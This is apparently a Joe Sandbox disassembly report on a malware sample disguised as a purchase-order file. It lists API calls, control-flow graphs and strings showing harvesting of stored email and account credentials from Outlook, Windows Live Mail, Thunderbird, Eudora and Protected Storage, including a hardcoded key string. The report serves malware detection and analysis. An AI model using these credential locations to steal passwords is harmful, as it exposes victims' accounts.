calls __fprintf_l 34456 4113b2 18 API calls 2 library calls 34460 40a3b8 memset sprintf SendMessageA 34074 410bbc 34077 4109cf 34074->34077 34078 4109dc 34077->34078 34079 410a23 memset GetPrivateProfileStringA 34078->34079 34080 4109ea memset 34078->34080 34085 407646 strlen 34079->34085 34090 4075cd sprintf memcpy 34080->34090 34083 410a65 34084 410a0c WritePrivateProfileStringA 34084->34083 34086 40765a 34085->34086 34087 40765c 34085->34087 34086->34083 34089 4076a3 34087->34089 34091 40737c strtoul 34087->34091 34089->34083 34090->34084 34091->34087 34272 40b5bf memset memset _mbsicmp

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040832F
                                                                                • memset.MSVCRT ref: 00408343
                                                                                • memset.MSVCRT ref: 0040835F
                                                                                • memset.MSVCRT ref: 00408376
                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 1832431107-3760989150
                                                                                • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                • String ID: ACD
                                                                                • API String ID: 379999529-620537770
                                                                                • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                • memset.MSVCRT ref: 00402003
                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                • memset.MSVCRT ref: 00402086
                                                                                • memset.MSVCRT ref: 0040209B
                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                • memset.MSVCRT ref: 00402018
                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                • API String ID: 1846531875-4223776976
                                                                                • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75920A60,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404AB8
                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404ADE
                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                • API String ID: 745651260-375988210
                                                                                • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                Strings
                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                • API String ID: 1197458902-317895162
                                                                                • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID: h4ND$k:v
                                                                                • API String ID: 3662548030-573399994
                                                                                • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                • API String ID: 2768085393-1693574875
                                                                                • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044430B
                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                • memset.MSVCRT ref: 00444379
                                                                                • memset.MSVCRT ref: 00444394
                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                Strings
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                • Store Root, xrefs: 004443A5
                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                • API String ID: 832325562-2578778931
                                                                                • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F567
                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2012582556-3916222277
                                                                                • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 345 4038bf-4038dd _mbscpy call 4023e5 342->345 344 4038a4-4038bc sprintf 343->344 343->345 344->345 345->334
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004037EB
                                                                                • memset.MSVCRT ref: 004037FF
                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                • strlen.MSVCRT ref: 00403897
                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                • String ID: %s@yahoo.com
                                                                                • API String ID: 317221925-3288273942
                                                                                • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 355 404af5-404afa 349->355 354 404adb 350->354 351->349 352 404ae8-404aea 351->352 352->355 354->351 356 404b13-404b17 355->356 357 404afc-404b12 MessageBoxA 355->357
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(comctl32.dll,75920A60,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404AB8
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75920A60), ref: 00404ADE
                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 2780580303-317687271
                                                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403504
                                                                                • memset.MSVCRT ref: 0040351A
